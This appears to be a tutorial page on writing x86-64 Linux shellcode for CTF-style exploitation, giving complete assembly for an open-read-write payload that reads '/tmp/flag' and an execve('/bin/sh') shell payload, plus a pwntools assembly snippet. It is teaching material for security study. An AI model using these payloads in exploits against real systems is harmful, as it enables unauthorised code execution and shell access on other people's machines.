Shellcoding

This page covers the shellcode writing process.

Shellcoding

A Shellcode is a small piece of code used to exploit software vulnerabilities. It is named for its original purpose (launching a command shell) but can perform various malicious tasks, such as executing commands or gaining control of a compromised system.

Why shellcoding?

Shellcode is used in system hacking to execute commands on a target machine after exploiting a vulnerability. It helps attackers gain control, escalate privileges, or inject malicious code. Because it runs directly in memory and bypasses security measures, shellcode is a powerful tool for exploitation.

Okay now, before we start writing shellcode, we wanna explore a new assembly/computer architecture concept (sorry)

Syscalls

Now that we know all about syscalls, we can start exploring what types of shellcode we have and what syscalls we need to execute.

Types of shellcode

We'll explore two types of shellcode, ORW and Execve, let's get into it!

ORW (Open-Read-Write) Shellcoding

orw shellcode (open-read-write), as the name suggests, is a shellcode that opens a file, reads it, and writes it to the screen. The goal of this section is to write a shellcode to read the file "/tmp/flag".

The behavior of the shellcode can be expressed as a pseudocode in C:

char buf[0x30];

int fd = open("/tmp/flag", RD_ONLY, NULL);
read(fd, buf, 0x30);
write(1, buf, 0x30);

syscalls needed to write orw shellcode are listed below.

syscall

rax

arg0 (rdi)

arg1 (rsi)

arg2 (rdx)

read

0x00

unsigned int fd

char *buf

size_t count

write

0x01

unsigned int fd

const char *buf

size_t count

open

0x02

const char *filename

int flags

umode_t mode

int fd = open("/tmp/flag", O_RDONLY, NULL)

The first step is to locate the string "/tmp/flag" into memory. This will be done by pushing the value 0x67616c662f706d742f (hex representation of "/tmp/flag" in little-endian) onto the stack. Since values can only be pushed onto the stack in 8-byte units, the process will involve pushing 0x67 first, then pushing 0x616c662f706d742f. Finally, move rsp to rdi so that rdi points to the string.

Since O_RDONLY is 0, rsi register should be set to 0.

// <https://code.woboq.org/userspace/glibc/bits/fcntl.h.html#24>
/* File access modes for `open' and `fcntl'.  */

#define        O_RDONLY        0        /* Open read-only.  */
#define        O_WRONLY        1        /* Open write-only.  */
#define        O_RDWR          2        /* Open read/write.  */

When reading a file, mode has no meaning, so set rdx to 0.

Finally, set rax to 2, the syscall number of open.

push 0x67
mov rax, 0x616c662f706d742f
push rax
mov rdi, rsp    ; rdi = "/tmp/flag"
xor rsi, rsi    ; rsi = 0 ; RD_ONLY
xor rdx, rdx    ; rdx = 0
mov rax, 2      ; rax = 2 ; syscall_open
syscall         ; open("/tmp/flag", RD_ONLY, NULL)

read(fd, buf, 0x30)

The return value of the open syscall is stored into rax, so the fd is stored in rax. Copy the value of rax to rdi to set the first argument of read to this value.

rsi points to the address to store the data read from the file. Since 0x30 bytes will be read, assign rsp-0x30 to rsi.

Set rdx to 0x30, the length of the data to be read from the file.

Set rax to 0 to call the read system call.

mov rdi, rax      ; rdi = fd
mov rsi, rsp
sub rsi, 0x30     ; rsi = rsp-0x30 ; buf
mov rdx, 0x30     ; rdx = 0x30     ; len
mov rax, 0x0      ; rax = 0        ; syscall_read
syscall           ; read(fd, buf, 0x30)
 the process to access the file using the assigned fd.

A file descriptor (fd) is a virtual access controller that Unix-like operating systems provide to software for accessing files. Each process has its own descriptor table, where various file descriptors are stored. Each descriptor is distinguished by a number - typically 0 is assigned to standard input (STDIN), 1 to standard output (STDOUT), and 2 to standard error (STDERR). These specific descriptors connects the process to the terminal. This allows us to pass input to the process via keyboard input and receive output to the terminal. After a program’s process is created, whenever the process associates a file via a function or system call like open, it typically assigns new file descriptors (fd) sequentially, starting from number 3. This allows the process to access the file using the assigned fd.

write(1, buf, 0x30)

Since the output needs to be directed to stdout (the screen), set rdi to 0x1.

rsi and rdx use the same value used in read.

Set rax to 1 to call the write system call.

mov rdi, 1        ; rdi = 1 ; fd = stdout
mov rax, 0x1      ; rax = 1 ; syscall_write
syscall           ; write(fd, buf, 0x30)

Taken together, they look like this:

;Name: orw.S

push 0x67
mov rax, 0x616c662f706d742f
push rax
mov rdi, rsp    ; rdi = "/tmp/flag"
xor rsi, rsi    ; rsi = 0 ; RD_ONLY
xor rdx, rdx    ; rdx = 0
mov rax, 2      ; rax = 2 ; syscall_open
syscall         ; open("/tmp/flag", RD_ONLY, NULL)

mov rdi, rax      ; rdi = fd
mov rsi, rsp
sub rsi, 0x30     ; rsi = rsp-0x30 ; buf
mov rdx, 0x30     ; rdx = 0x30     ; len
mov rax, 0x0      ; rax = 0        ; syscall_read
syscall           ; read(fd, buf, 0x30)

mov rdi, 1        ; rdi = 1 ; fd = stdout
mov rax, 0x1      ; rax = 1 ; syscall_write
syscall           ; write(fd, buf, 0x30)

CONGRATS! You just wrote your first shellcode!!!

Execve Shellcoding

The execve shellcode consists of only the execve system call.

syscall

rax

arg0 (rdi)

arg1 (rsi)

arg2 (rdx)

execve

0x3b

const char *filename

const char *const *argv

const char *const *envp

argv is the argument to be passed to the executable, and envp is the environment variable. Since only sh needs to be run, all the other values can be set to null. On Linux, the default executables are stored in the /bin/ directory, where sh is located in.

The goal is to write shellcode to run execve("/bin/sh", null, null). This is not as complex as the orw shellcode written earlier, so try writing it yourself and then compare it to the shellcode below.

;Name: execve.S

mov rax, 0x68732f6e69622f
push rax
mov rdi, rsp  ; rdi = "/bin/sh\\\\x00"
xor rsi, rsi  ; rsi = NULL
xor rdx, rdx  ; rdx = NULL
mov rax, 0x3b ; rax = sys_execve
syscall       ; execve("/bin/sh", null, null)

Compiling Assembly into Shellcode with Pwntools

Use the pwn.asm() function to compile assembly into shellcode:

from pwn import *

assembly_code = """
    xor rax, rax
    mov al, 60
    xor rdi, rdi
    syscall
"""

shellcode = asm(assembly_code)
print(shellcode.hex())  # Prints shellcode in hex format

This script converts the assembly into raw shellcode, which can be used in an exploit.

References

Dreamhack is amazing guys, go read their material :))

Previousx86-64 Assembly Cheatsheet NextSyscalls

Last updated 3 months ago